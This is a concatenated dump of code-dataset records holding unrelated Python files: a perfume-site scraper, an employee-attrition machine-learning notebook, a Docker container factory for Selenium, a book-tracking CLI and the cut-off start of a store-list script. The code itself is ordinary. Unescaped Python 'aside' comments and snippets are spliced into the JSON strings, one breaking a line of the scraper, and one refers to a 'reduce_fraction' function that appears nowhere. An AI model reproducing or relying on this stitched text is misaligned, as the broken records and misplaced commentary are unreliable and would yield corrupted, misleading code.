opener.open('https://www.fragrantica.com/designers/')\n\n#pageContent = requests.get('https://www.fragrantica.com/designers/')\n#soup = BeautifulSoup(pageContent.content, 'html.parser')\nuser_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'\n\nurl = \"https://www.fragrantica.com/designers/\"\nheaders={'User-Agent':user_agent,} \n\nrequest=urllib.request.Request(url,None,headers) #The assembled request\nresponse = 
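# Aside on reduce_fraction above (whose `count` parameter is unused): Fraction
# multiplication normalizes at every step, so the separate numerator and
# denominator products are unnecessary. An equivalent sketch:
import operator
from functools import reduce
from fractions import Fraction

def reduce_fraction_product(fracs):
    product = reduce(operator.mul, fracs, Fraction(1))
    return product.numerator, product.denominator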
urllib.request.urlopen(request)\n\n\nsoup = BeautifulSoup(response, 'html.parser')\ndesigners = soup.find_all('div', class_=\"nduList\")\n\nlistDesigners = list(designers)\ni = 0\nj = 0\n\nnow = datetime.datetime.now()\nfileName=now.strftime(\"frag-%Y%m%d-%H%M.csv\")\nf = open(fileName, \"w\")\nShortListDesigner=listDesigners#[:5]\nf.write(\"Number | Designer | Perfume | rating | ratingCount | Comments | Poor | Week| moderate | long lasting | very long lasting | URL\")\nfor designer in ShortListDesigner:\n i = i + 1\n # f.write(str(i) + ' | '+ designer.text+ ' | '+ 'https://www.fragrantica.com'+designer.a['href']+',')\n print(str(i) + ' | ' + designer.text, ' | ' + 'https://www.fragrantica.com' + designer.a['href'])\n #designerPage = requests.get('https://www.fragrantica.com' + designer.a['href'])\n #designersoup = BeautifulSoup(designerPage.content, 'html.parser')\n requestDesigner=urllib.request.Request('https://www.fragrantica.com' + designer.a['href'],None,headers) \n designerPage = urllib.request.urlopen(requestDesigner)\n designersoup = BeautifulSoup(designerPage, 'html.parser')\n perfumes = designersoup.find_all('div', class_=\"perfumeslist\")\n listperfumes =list(perfumes)\n SamplePerfumeList=listperfumes#[:5]\n for perfume in SamplePerfumeList:\n j = j + 1\n print(str(j).zfill(5) + ' ' + perfume.text, end='| ')\n requestPerfume=urllib.request.Request('https://www.fragrantica.com' + perfume.a['href'],None,headers) \n PerfumePage = urllib.request.urlopen(requestPerfume)\n PerfumePagesoup = BeautifulSoup(PerfumePage, 'html.parser')\n ratingValue=\" \" if(PerfumePagesoup.find(itemprop=\"ratingValue\") is None) else PerfumePagesoup.find(itemprop=\"ratingValue\").get_text()\n ratingCount=\" \" if(PerfumePagesoup.find(itemprop=\"ratingCount\") is None) else PerfumePagesoup.find(itemprop=\"ratingCount\").get_text()\n PerfumeReviews=PerfumePagesoup.find_all('div', class_=\"revND\")\n longtivityTable=PerfumePagesoup.find('table', class_=\"voteLS long\")\n longValuesList=list(longtivityTable)\n longValuesCells=longValuesList[3::2]\n Silage=\"\"\n for row in longValuesCells:\n cells= row.find_all(\"td\")\n Cat= cells[0].get_text()\n Val=cells[1].get_text()\n Silage+=Val+ \" | \"\n \n reviwsCount=len(PerfumeReviews)\n print(ratingValue, end =' ')\n print(ratingCount)\n\n info = (str(j).zfill(5) + ' | ' + designer.text + ' | ' + perfume.text + ' | ' + ratingValue+ ' | ' + ratingCount + ' | ' + str(reviwsCount) +' | ' +Silage + 'https://www.fragrantica.com' + perfume.a['href'] + '>').encode(\"utf-8\")\n f.write(str(info))\n time.sleep(1)\nf.close()\n","repo_name":"usamanaem/fragrantica_parser","sub_path":"AllFragsParser.py","file_name":"AllFragsParser.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"14295553971","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # IBM HR Analytics Employee Attrition & Performance\n# \n# Uncover the factors that lead to employee attrition and explore important questions such as ‘show me a breakdown of distance from home by job role and attrition’ or ‘compare average monthly income by education and attrition’. 
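# One possible simplification of the urllib.request plumbing in the scraper
# above: a requests.Session with a default User-Agent header (sketch only, not
# a drop-in rewrite; the header string mirrors the one defined above):
session = requests.Session()
session.headers["User-Agent"] = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; "
                                 "en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7")
page = session.get("https://www.fragrantica.com/designers/")
soup = BeautifulSoup(page.content, "html.parser")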
This is a fictional data set created by IBM data scientists.\n# \n# Education :\n# 'Below College' ,\n# 'College' ,\n# 'Bachelor' ,\n# 'Master' ,\n# 'Doctor'\n# \n# EnvironmentSatisfaction :\n# 'Low' ,\n# 'Medium' ,\n# 'High' ,\n# 'Very High' \n# \n# JobInvolvement :\n# 'Low' ,\n# 'Medium' ,\n# 'High' ,\n# 'Very High'\n# \n# JobSatisfaction :\n# 'Low' ,\n# 'Medium' ,\n# 'High',\n# 'Very High'\n# \n# PerformanceRating\n# 'Low' ,\n# 'Good' ,\n# 'Excellent' ,\n# 'Outstanding'\n# \n# RelationshipSatisfaction :\n# 'Low' ,\n# 'Medium' ,\n# 'High' ,\n# 'Very High'\n# \n# WorkLifeBalance :\n# 'Bad' ,\n# 'Good' ,\n# 'Better' ,\n# 'Best'\n\n# In[ ]:\n\n\nimport numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport seaborn as sb\nimport sklearn \nimport scipy\nimport statsmodels.api as sm\nimport warnings \nwarnings.filterwarnings(\"ignore\")\n\n\n# # Reading dataset\n\n# In[41]:\n\n\ndf = pd.read_csv('IBM HR Analytics Employee Attrition.csv')\ndf.head()\n\n\n# In[42]:\n\n\ndf.shape\n\n\n# # Data perprocessing & EDA\n\n# In[43]:\n\n\ndef dataoveriew(df, message):\n print(f'{message}:\\n')\n print(\"Rows:\", df.shape[0])\n print(\"\\nNumber of features:\", df.shape[1])\n print(\"\\nFeatures:\")\n print(df.columns.tolist())\n print(\"\\nMissing values:\", df.isnull().sum().values.sum())\n print(\"\\nUnique values:\")\n print(df.nunique())\n\n\n# In[44]:\n\n\ndataoveriew(df, 'Overiew of the training dataset')\n\n\n# In[45]:\n\n\n#checking datatypes\ndf.info()\n\n\n# # Dividing the columns into 2 categories (continuous and categorical)\n\n# In[46]:\n\n\ncat =[]\ncon=[]\nfor i in df.columns:\n if df[i].dtypes == \"object\":\n cat.append(i)\n else:\n con.append(i)\n\n\n# In[47]:\n\n\ndf.describe().columns\n\n\n# In[48]:\n\n\ncat_df=df[['Attrition','BusinessTravel','Department','Over18','Gender','OverTime','JobRole','MaritalStatus','EducationField']]\n\n\n# In[49]:\n\n\ncon_df=df[['Age', 'DailyRate', 'DistanceFromHome', 'Education','EmployeeNumber', 'EnvironmentSatisfaction',\n 'HourlyRate','JobInvolvement', 'JobLevel', 'JobSatisfaction', 'MonthlyIncome','MonthlyRate', 'NumCompaniesWorked',\n 'PercentSalaryHike','PerformanceRating', 'RelationshipSatisfaction','StockOptionLevel',\n 'TotalWorkingYears', 'TrainingTimesLastYear','WorkLifeBalance', 'YearsAtCompany', 'YearsInCurrentRole',\n 'YearsSinceLastPromotion', 'YearsWithCurrManager']]\n\n\n# In[50]:\n\n\n# check for missing values \ndf.isnull().sum()\n\n\n# In[51]:\n\n\n# statistical measures of the dataset\ndf.describe()\n\n\n# it seems that some of columns are not normalised \n\n# # visiualizing the data\n\n# In[90]:\n\n\nsb.distplot(df.DistanceFromHome)\nplt.show()\ndf['DistanceFromHome_sqrt']=np.sqrt(df.DistanceFromHome)\nsb.distplot(df.DistanceFromHome_sqrt)\nplt.show()\ndf['DistanceFromHome_log']=np.log(df.DistanceFromHome)\nsb.distplot(df.DistanceFromHome_log)\nplt.show()\n\n\n# In[91]:\n\n\nsb.distplot(df.MonthlyIncome)\nplt.show()\ndf['MonthlyIncome_sqrt']=np.sqrt(df.MonthlyIncome)\nsb.distplot(df.MonthlyIncome_sqrt)\nplt.show()\ndf['MonthlyIncome_log']=np.log(df.MonthlyIncome)\nsb.distplot(df.MonthlyIncome_log)\nplt.show()\n\n\n# In[92]:\n\n\nsb.distplot(df.PercentSalaryHike)\nplt.show()\ndf['PercentSalaryHike_sqrt']=np.sqrt(df.PercentSalaryHike)\nsb.distplot(df.PercentSalaryHike_sqrt)\nplt.show()\ndf['PercentSalaryHike_log']=np.log(df.PercentSalaryHike)\nsb.distplot(df.PercentSalaryHike_log)\nplt.show()\n\n\n# 
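# Hedged aside on the log transforms above: np.log requires strictly positive
# input. For columns that can contain zeros (e.g., YearsAtCompany and
# YearsSinceLastPromotion, which the next cells transform with sqrt instead),
# np.log1p, i.e. log(1 + x), is the safe variant:
df["YearsAtCompany_log1p"] = np.log1p(df["YearsAtCompany"])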
In[93]:\n\n\nsb.distplot(df.YearsAtCompany)\nplt.show()\ndf['YearsAtCompany_sqrt']=np.sqrt(df.YearsAtCompany)\nsb.distplot(df.YearsAtCompany_sqrt)\nplt.show()\n\n\n# In[94]:\n\n\nsb.distplot(df.YearsSinceLastPromotion)\nplt.show()\ndf['YearsSinceLastPromotion_sqrt']=np.sqrt(df.YearsSinceLastPromotion)\nsb.distplot(df.YearsSinceLastPromotion_sqrt)\nplt.show()\n\n\n# # correlation through heatmap\n\n# In[57]:\n\n\ncorr_heatmap= con_df.corr()\nf, ax = plt.subplots(figsize=(20,12))\nsb.heatmap(corr_heatmap,vmax=0.8,annot=True)\n\n\n# In[58]:\n\n\n#show how mush % employees left the organizatin\ndf.Attrition.value_counts(normalize= True)\n\n\n# In[59]:\n\n\nAttrition= df.Attrition.value_counts()\nsb.barplot(x=df.Attrition.index,y=df.Attrition.values)\n\n\n# In[60]:\n\n\ndf['Attrition'].value_counts().plot(kind= \"pie\")\n\n\n# most of them is no so this is class imbalanced problem\n\n# In[61]:\n\n\ndf.OverTime.value_counts(normalize= True)\n\n\n# In[62]:\n\n\nOverTime= df.Attrition.value_counts()\nsb.barplot(x=df.OverTime.index,y=df.OverTime.values)\n\n\n# In[63]:\n\n\ndf['OverTime'].value_counts().plot(kind= \"pie\")\n\n\n# In[64]:\n\n\n#Bar plots\nBarPlot_columns=['Age', 'DistanceFromHome','JobInvolvement','TotalWorkingYears',\n'TrainingTimesLastYear','WorkLifeBalance', 'JobLevel' ,'TotalWorkingYears' , 'YearsInCurrentRole']\n\n\n# In[65]:\n\n\n#method for performing bar plots\ndef Bar_plots(var):\n col = pd.crosstab(df[var],df.Attrition)\n col.div(col.sum(1).astype(float),axis = 0).plot(kind = \"bar\",stacked= False , figsize=(8,4))\n plt.xticks(rotation=90)\n\n\n# In[66]:\n\n\nfor col in BarPlot_columns:\n Bar_plots(col)\n\n\n# # Insights :\n# 1- attrition is very high wih employees between 18 : 22 years old\n# \n# 2- attrition is more when distance of hte office is more from home\n# \n# 3- attrition is high with employees's education in HR field\n# \n# 4- employees wgo work overtime have high attrition than who didn't\n# \n# 5- emploees who are working less than 2 years have more attrition\n\n# # outliers checking and treatment\n\n# In[67]:\n\n\nimport numpy as np\nfrom scipy import stats\n\n\n# In[68]:\n\n\nz= np.abs(stats.zscore(df[['Age', 'DailyRate', 'DistanceFromHome', 'Education','EmployeeNumber', 'EnvironmentSatisfaction',\n 'HourlyRate','JobInvolvement', 'JobLevel', 'JobSatisfaction', 'MonthlyIncome','MonthlyRate', 'NumCompaniesWorked',\n 'PercentSalaryHike','PerformanceRating', 'RelationshipSatisfaction','StockOptionLevel',\n 'TotalWorkingYears', 'TrainingTimesLastYear','WorkLifeBalance', 'YearsAtCompany', 'YearsInCurrentRole',\n 'YearsSinceLastPromotion', 'YearsWithCurrManager']]))\nprint(z)\nthreshold = 3 \nprint(np.where(z>3))\n\n\n# In[69]:\n\n\nprint(z[0][0])\n\n\n# In[70]:\n\n\ndf\n\n\n# # removing outliers\n\n# In[71]:\n\n\ndf_out = df[(z<3).all(axis=1)]\n\n\n# In[77]:\n\n\ndf_out1 =df_out.drop(['DistanceFromHome_sqrt','DistanceFromHome_log',\n 'MonthlyIncome_sqrt','MonthlyIncome_log',\n 'PercentSalaryHike_sqrt','PercentSalaryHike_log'\n ,'YearsAtCompany_sqrt','YearsSinceLastPromotion_sqrt'],axis=1)\n\n\n# In[78]:\n\n\ndf_out1.head()\n\n\n# In[79]:\n\n\ndf_out1.shape\n\n\n# dividing final dataset into categorical and continous variables\n\n# In[80]:\n\n\nnumerical_df= df_out1.select_dtypes(include=np.number)\ncategorical_df= df_out1.select_dtypes(exclude=np.number)\nnumeric_cols =list (numerical_df.columns)\ncategorical_cols = list(categorical_df.columns)\n\n\n# # converting categorical variables to binary\n\n# In[81]:\n\n\ncategorical_df_dummies= 
pd.get_dummies(df_out1[categorical_cols],drop_first= True)\nfinal_df= pd.concat([categorical_df_dummies,numerical_df],axis=1)\nfinal_df.head()\n\n\n# In[82]:\n\n\nfinal_df.shape\n\n\n# # Creating models:\n\n# In[83]:\n\n\nX=final_df[['BusinessTravel_Travel_Frequently','BusinessTravel_Travel_Rarely',\n 'Department_Research & Development','Department_Sales',\n 'EducationField_Life Sciences','EducationField_Marketing',\n 'EducationField_Medical','EducationField_Other',\n 'EducationField_Technical Degree','StockOptionLevel','TotalWorkingYears',\n 'TrainingTimesLastYear','WorkLifeBalance','YearsAtCompany',\n 'YearsInCurrentRole', 'YearsSinceLastPromotion','YearsWithCurrManager']]\nY= final_df[['Attrition_Yes']]\n\n\n# # train - test - split\n\n# In[ ]:\n\n\nfrom sklearn.model_selection import train_test_split\nxtrain,xtest,ytrain,ytest=train_test_split(X,Y,test_size=0.3,random_state=42)\n\n\n# RandomForestClassifier Model\n\n# In[95]:\n\n\n\n\nfrom sklearn.ensemble import RandomForestClassifier\nrfc = RandomForestClassifier(n_estimators=10,max_depth=4)\nmodel=rfc.fit(xtrain,ytrain)\npred= model.predict(xtest)\n\nfrom sklearn.metrics import confusion_matrix ,accuracy_score\nprint('the confusion matrix \\n',confusion_matrix(ytest['Attrition_Yes'],pred))\nprint('the accuracy of the RandomForestClassifier is',accuracy_score(ytest['Attrition_Yes'],pred))\n\n\n# In[85]:\n\n\nmodel.feature_importances_\n\n\n# In[86]:\n\n\nimport matplotlib.pyplot as plt\nf, ax =plt.subplots(figsize=(10,12))\nplt.barh(X.columns,model.feature_importances_)\n\n\n# LogisticRegression Model\n\n# In[96]:\n\n\nfrom sklearn.linear_model import LogisticRegression\n\nlr = LogisticRegression()\nmodel_lr=lr.fit(xtrain,ytrain)\npred= model_lr.predict(xtest)\n\nfrom sklearn.metrics import confusion_matrix ,accuracy_score\nprint('the confusion matrix \\n',confusion_matrix(ytest['Attrition_Yes'],pred))\nprint('the accuracy of the LogisticRegression is',accuracy_score(ytest['Attrition_Yes'],pred))\n\n\n# DecisionTreeClassifier Model\n\n# In[98]:\n\n\nfrom sklearn.tree import DecisionTreeClassifier\ndtc = DecisionTreeClassifier(criterion='entropy',min_samples_leaf=4)\nmodel_dtc=dtc.fit(xtrain,ytrain)\npred= model_dtc.predict(xtest)\n\nfrom sklearn.metrics import confusion_matrix ,accuracy_score\nprint('the confusion matrix \\n',confusion_matrix(ytest['Attrition_Yes'],pred))\nprint('the accuracy of the DecisionTreeClassifier is',accuracy_score(ytest['Attrition_Yes'],pred))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Ahmedsaeedd1/IBM-Analytics-Employee-Attrition-Performance","sub_path":"IBM Analytics Employee Attrition & Performance.py","file_name":"IBM Analytics Employee Attrition & Performance.py","file_ext":"py","file_size_in_byte":9567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21317166915","text":"import logging\nimport time\nfrom abc import abstractmethod\nfrom collections import Mapping\nfrom functools import partial, wraps\n\nimport docker\nimport gevent\nfrom docker.errors import APIError, DockerException, NotFound\nfrom docker.models.containers import Container\nfrom six import string_types\n\nfrom selenium_docker.errors import DockerError, SeleniumDockerException\nfrom selenium_docker.utils import gen_uuid\n\n\ndef check_engine(fn):\n \"\"\" Pre-check our engine connection by sending a ping before our\n intended operation.\n\n Args:\n fn (Callable): wrapped function.\n\n Returns:\n Callable\n\n Example::\n\n @check_engine\n def do_something_with_docker(self):\n # 
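# Hedged evaluation note for the three classifiers above: Attrition is
# imbalanced (as observed earlier), so plain accuracy can look strong while
# most "Yes" cases are missed. A per-class report on the last fitted model,
# reusing the existing split:
from sklearn.metrics import classification_report, balanced_accuracy_score
pred = model_dtc.predict(xtest)
print(classification_report(ytest["Attrition_Yes"], pred))
print("balanced accuracy:", balanced_accuracy_score(ytest["Attrition_Yes"], pred))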
will raise APIError before getting here\n # if there's a problem with the Docker Engine connection.\n return True\n \"\"\"\n\n @wraps(fn)\n def inner(self, *args, **kwargs):\n self.logger.debug('pinging docker engine')\n try:\n self.docker.ping()\n except SeleniumDockerException as e: # pragma: no cover\n self.logger.exception(e, exc_info=True)\n raise e\n else:\n self.logger.debug('pass')\n return fn(self, *args, **kwargs)\n return inner\n\n\nclass ContainerInterface(object):\n \"\"\" Required functionality for implementing a custom object that has an\n underlying container.\n \"\"\"\n\n CONTAINER = None\n\n def __str__(self):\n return '<%s(image=%s)>' % (\n self.__class__.__name__, self.CONTAINER.get('image', 'None'))\n\n @abstractmethod\n def _make_container(self):\n raise NotImplementedError\n\n @abstractmethod\n def close_container(self):\n raise NotImplementedError\n\n @abstractmethod\n def quit(self):\n raise NotImplementedError\n\n\nclass ContainerFactory(object):\n \"\"\" Used as an interface for interacting with Container instances.\n\n Example::\n\n from selenium_docker.base import ContainerFactory\n\n factory = ContainerFactory.get_default_factory('reusable')\n factory.stop_all_containers()\n\n Will attempt to connect to the local Docker Engine, including the word\n ``reusable`` as part of each new container's name. Calling\n ``factory.stop_all_containers()`` will stop and remove containers assocated\n with that namespace.\n\n Reusing the same ``namespace`` value will allow the factory to inherit\n the correct containers from Docker when the program is reset.\n\n Args:\n engine (:obj:`docker.client.DockerClient`): connection to the\n Docker Engine the application will interact with. If ``engine`` is\n ``None`` then :func:`docker.client.from_env` will be called to\n attempt connecting locally.\n namespace (str): common name included in all the new docker containers\n to allow tracking their status and cleaning up reliably.\n make_default (bool): when ``True`` this instance will become the\n default, used as a singleton, when requested via\n :func:`~ContainerFactory.get_default_factory`.\n logger (:obj:`logging.Logger`): logging module Logger instance.\n \"\"\"\n\n DEFAULT = None\n \"\"\":obj:`.ContainerFactory`: singleton instance to a container factory\n that can be used to spawn new containers accross a single connected\n Docker engine.\n \n This is the instance returned by \n :func:`~ContainerFactory.get_default_factory`. 
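    For illustration only (``demo`` is an arbitrary namespace value), the
    singleton is typically retrieved as::

        factory = ContainerFactory.get_default_factory('demo')
        assert factory is ContainerFactory.DEFAULT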
\n \"\"\"\n\n __slots__ = ('_containers', '_engine', '_ns', 'logger')\n\n def __init__(self, engine, namespace, make_default=True, logger=None):\n self._containers = {}\n self._engine = engine or docker.from_env()\n self._ns = namespace or gen_uuid(10)\n self.logger = logger or logging.getLogger(\n '%s.ContainerFactory.%s' % (__name__, self._ns))\n\n if make_default and ContainerFactory.DEFAULT is None:\n ContainerFactory.DEFAULT = self\n\n if namespace:\n # we supplied the namespace, we can bootstrap our\n # tracked containers back from the environment\n self._containers = self.get_namespace_containers(namespace)\n\n def __repr__(self):\n return '' % (\n self._engine.api.base_url, self._ns, len(self._containers.keys()))\n\n @property\n def containers(self):\n \"\"\"dict:\n :obj:`~docker.models.containers.Container` instances\n mapped by name.\n \"\"\"\n return self._containers\n\n @property\n def docker(self):\n \"\"\":obj:`docker.client.DockerClient`:\n reference to the connected Docker engine.\n \"\"\"\n return self._engine\n\n @property\n def namespace(self):\n \"\"\"str: ready-only property for this instance's namespace,\n used for generating names.\n \"\"\"\n return self._ns\n\n def __bootstrap(self, container, **kwargs):\n \"\"\" Adds additional attributes and functions to Container instance.\n\n Args:\n container (Container): instance of\n :obj:`~docker.models.containers.Container` that is being\n fixed up with expected values.\n kwargs (dict): arbitrary attribute names and their values to\n attach to the ``container`` instance.\n\n Returns:\n :obj:`~docker.models.containers.Container`:\n the exact instance passed in.\n \"\"\"\n self.logger.debug('bootstrapping container instance to factory')\n c = container\n for k, v in kwargs.items(): # pragma: no cover\n setattr(c, k, v)\n c.started = time.time()\n c.logger = logging.getLogger('%s.%s' % (__name__, kwargs.get('name')))\n c.ns = self._ns\n return c\n\n def as_json(self):\n \"\"\" JSON representation of our factory metadata.\n\n Returns:\n dict:\n that is a :py:func:`json.dumps` compatible dictionary instance.\n \"\"\"\n return {\n '_ref': str(self),\n 'count': len(self.containers)\n }\n\n def gen_name(self, key=None):\n \"\"\" Generate the name of a new container we want to run.\n\n This method is used to keep names consistent as well as to ensure\n the name/identity of the ``ContainerFactory`` is included. When a\n ``ContainerFactory`` is loaded on a machine with containers already\n running with its name it'll inherit those instances to re-manage\n between application runs.\n\n Args:\n key (str): the identifiable portion of a container name. If one\n isn't supplied (the default) then one is randomly generated.\n\n Returns:\n str:\n in the format of ``selenium--``.\n \"\"\"\n return 'selenium-%s-%s' % (self._ns, key or gen_uuid(6))\n\n @classmethod\n def get_default_factory(cls, namespace=None, logger=None):\n \"\"\" Creates a default connection to the local Docker engine.\n\n This ``classmethod`` acts as a singleton. If one hasn't been made it\n will attempt to create it and attach the instance to the class\n definition. Because of this the method is the preferable way to obtain\n the default connection so it doesn't get overwritten or modified by\n accident.\n\n Note:\n By default this method will attempt to connect to the **local**\n Docker engine only. 
Do not use this when attempting to use\n a remote engine on a different machine.\n\n Args:\n namespace (str): use this namespace if we're creating a new\n default factory instance.\n logger (:obj:`logging.Logger`): instance of logger to attach\n to this factory instance.\n\n Returns:\n :obj:`~.ContainerFactory`: instance to interact with Docker engine.\n \"\"\"\n if cls.DEFAULT is None:\n cls(None, namespace, make_default=True, logger=logger)\n return cls.DEFAULT\n\n @check_engine\n def get_namespace_containers(self, namespace=None):\n \"\"\" Glean the running containers from the environment that are\n using our factory's namespace.\n\n Args:\n namespace (str): word identifying ContainerFactory containers\n represented in the Docker Engine.\n\n Returns:\n dict:\n :obj:`~docker.models.containers.Container` instances\n mapped by name.\n \"\"\"\n if namespace is None:\n namespace = self.namespace\n ret = {}\n for c in self.docker.containers.list():\n if namespace in c.name:\n ret[c.name] = c\n return ret\n\n @check_engine\n def load_image(self, image, tag=None, insecure_registry=False,\n background=False):\n \"\"\" Issue a ``docker pull`` command before attempting to start/run\n containers. This could potentially increase startup time, as well\n as ensure the containers are up-to-date.\n\n Args:\n image (str): name of the container we're downloading.\n tag (str): tag/version of the container.\n insecure_registry (bool): allow downloading image templates from\n insecure Docker registries.\n background (bool): spawn the download in a background thread.\n\n Raises:\n :exc:`docker.errors.DockerException`:\n if anything goes wrong during the image template download.\n\n Returns:\n :obj:`docker.models.images.Image`:\n the Image controlled by the connected Docker engine.\n Containers are spawned based off this template.\n \"\"\"\n if tag is None:\n tag = ''\n if isinstance(image, Mapping):\n image = image.get('image', None)\n if not isinstance(image, string_types):\n raise ValueError('cannot determine image from %s' % type(image))\n\n try:\n self.logger.debug('checking locally for image')\n img = self.docker.images.get(image)\n except NotFound as e:\n self.logger.debug('could not find image locally, %s', image)\n else:\n return img\n\n self.logger.debug('loading image, %s:%s', image, tag or 'latest')\n fn = partial(self.docker.images.pull,\n image,\n tag=tag,\n insecure_registry=insecure_registry,\n stream=True)\n if background:\n gevent.spawn(fn)\n else:\n return fn()\n\n @check_engine\n def scrub_containers(self, *labels):\n \"\"\" Remove **all** containers that were dynamically created.\n\n Args:\n labels (str): labels to include in our search for finding\n containers to scrub from the connected Docker engine.\n\n Returns:\n int: the number of containers stopped and removed.\n \"\"\"\n\n def stop_remove(c):\n try:\n c.stop()\n c.remove()\n except NotFound:\n self.logger.warning('could not find container %s', c.name)\n\n total = 0\n self.logger.debug('scrubbing all containers by library')\n # attempt to stop all the containers normally\n self.stop_all_containers()\n labels = ['browser', 'dynamic'] + list(set(labels))\n threads = []\n found = set()\n # now close all dangling containers\n for label in labels:\n containers = self.docker.containers.list(\n filters={'label': label})\n count = len(containers)\n self.logger.debug(\n 'found %d dangling containers with label %s',\n count, label)\n total += count\n for c in containers:\n if c.name not in found:\n found.add(c.name)\n 
threads.append(gevent.spawn(stop_remove, c))\n for t in reversed(threads):\n t.join()\n return total\n\n @check_engine\n def start_container(self, spec, **kwargs):\n \"\"\" Creates and runs a new container defined by ``spec``.\n\n Args:\n spec (dict): the specification of our docker container. This\n can include things such as the name, labels, image,\n restart conditions, etc. The built-in driver containers\n already have this defined in their class declaration.\n kwargs ([str, str]): additional arguments that will be added\n to ``spec``; generally dynamic attributes modifying a static\n container definition.\n\n Raises:\n :exc:`docker.errors.DockerException`:\n when there's any problem performing start and run on the\n container we're attemping to create.\n\n Returns:\n :obj:`docker.models.containers.Container`:\n the newly created and managed container instance.\n \"\"\"\n if 'image' not in spec:\n raise DockerException('cannot create container without image')\n\n self.logger.debug('starting container')\n\n name = spec.get('name', kwargs.get('name', self.gen_name()))\n\n for key in kwargs.keys():\n if key not in spec:\n self.logger.debug('updating `%s` in spec', key)\n\n kw = dict(spec)\n kw.update(kwargs)\n kw['name'] = name\n\n try:\n container = self.docker.containers.run(**kw)\n except DockerException as e: # pragma: no cover\n self.logger.exception(e, exc_info=True)\n raise e\n\n # track this container\n self._containers[name] = self.__bootstrap(container)\n self.logger.debug('started container %s', name)\n return container\n\n @check_engine\n def stop_all_containers(self):\n \"\"\" Remove all containers from this namespace.\n\n Raises:\n APIError: when there's a problem communicating with\n the Docker Engine.\n NotFound: when a tracked container cannot be found in\n the Docker Engine.\n\n Returns:\n None\n \"\"\"\n self.logger.debug('stopping all containers')\n for name in list(self.containers.keys()):\n self.stop_container(name=name)\n\n @check_engine\n def stop_container(self, name=None, key=None, timeout=10):\n \"\"\" Remove an individual container by name or key.\n\n Args:\n name (str): name of the container.\n key (str): partial reference to the container. 
(Optional)\n timeout (int): time in seconds to wait before sending ``SIGKILL``\n to a running container.\n\n Raises:\n ValueError: when ``key`` and ``name`` are both ``None``.\n APIError: when there's a problem communicating with Docker engine.\n NotFound: when no such container by ``name`` exists.\n\n Returns:\n None\n \"\"\"\n e = None # type: Exception\n container = None # type: Container\n if key and not name:\n name = self.gen_name(key=key)\n if not name:\n raise ValueError('`name` and `key` cannot both be None')\n if name not in self.containers:\n self.logger.warning('container %s is not being tracked' % name)\n # we're not tracking the container in our internal state\n # so we need to query the docker engine and see if it's there.\n try:\n container = self.docker.containers.get(name)\n except NotFound as e:\n self.logger.error('cannot find container via docker engine')\n return container\n except APIError as e:\n self.logger.exception(e, exc_info=True)\n raise DockerError(e)\n else:\n container = self.containers.pop(name)\n if e is not None:\n # if we couldn't get a reference to the container through our\n # Factory instance alert that; it means we're leaking Container\n # references.\n self.logger.info('container recovered from engine, not instance')\n self.logger.debug('stopping container %s', name)\n try:\n container.stop(timeout=timeout)\n container.remove(force=True)\n except APIError as e:\n self.logger.error('could not stop container %s', container.name)\n self.logger.exception(e, exc_info=True)\n raise DockerError(e)\n","repo_name":"vivint/selenium-docker","sub_path":"selenium_docker/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":16574,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"71878862509","text":"from utils import database\n\nUSER_CHOICE = \"\"\"\nPlease enter one of the following:\n- 'a' to add a new book\n- 'l' to list all books\n- 'r' to mark a book as read\n- 'd' to delete a book\n- 'q' to quit\n\"\"\"\n\nSIMPLE_USER_CHOICE = \"\\n(a)dd, (l)ist, (r)ead, (d)elete, (q)uit\\n\"\n\n\ndef get_book_name():\n return input(\"What is the name of the book: \")\n\n\ndef get_book_info():\n name = get_book_name()\n author = input(\"Who is the author: \")\n read = input(\"Have you read this book (y/n): \")\n # could check for valid input here?\n if read == \"y\":\n read = 1\n else:\n read = 0\n\n print(read)\n return {\"name\": name, \"author\": author, \"read\": read}\n\n\ndef add_book():\n book = get_book_info()\n database.add_book(book)\n\n\ndef list_books():\n books = database.get_books()\n\n for book in books:\n book_string = f'{book[\"name\"]} was written by {book[\"author\"]}. 
'\n if book[\"read\"]:\n book_string = book_string + \"I have finished it.\"\n else:\n book_string = book_string + \"I have not read it yet.\"\n\n print(book_string)\n\n\ndef read_book():\n name = get_book_name()\n database.read_book(name)\n\n\ndef delete_book():\n name = get_book_name()\n database.delete_book(name)\n\n\nUSER_OPTIONS = {\n \"a\": add_book,\n \"l\": list_books,\n \"r\": read_book,\n \"d\": delete_book,\n}\n\n\ndef menu():\n database.create_book_table()\n user_input = input(USER_CHOICE)\n while user_input != \"q\":\n if user_input in USER_OPTIONS:\n USER_OPTIONS[user_input]()\n else:\n print(\"Unknown command, please try again\")\n\n user_input = input(SIMPLE_USER_CHOICE)\n\n print(\"Thanks, bye\")\n\n\nmenu()\n","repo_name":"joegurr/python-books-cli","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18353666385","text":"from posixpath import splitext\nfrom tracemalloc import stop\nfrom PIL import Image\nimport pandas as pd\nimport openpyxl as pyxl\nimport os\nimport numpy as np\nfrom scipy import rand\n\ntenpo = [\n [\"01001008 FUN柏\",\"柏\"],\n [\"01001009 FUN千葉C-one\",\"千葉\"],\n [\"01001028 FUNスマーク伊勢崎\",\"伊勢崎\"],\n # [\"01001032 FUNララガーデン長町\",\"長町\"],\n # [\"01001033 FUNららぽーとTOKYO-BAY\",\"船橋\"],\n [\"01001034 FUNららぽーと富士見\",\"富士見\"],\n [\"01001036 FUNイオンレイクタウン\",\"レイク\"],\n [\"01001038 FUNららぽーと海老名\",\"海老名\"],\n [\"01001039 FUNイオンモールむさし村山\",\"むさし\"],\n [\"01001040 FUNららぽーと湘南平塚\",\"平塚\"],\n [\"01001041 FUNイオンモール名取\",\"名取\"],\n [\"01001042 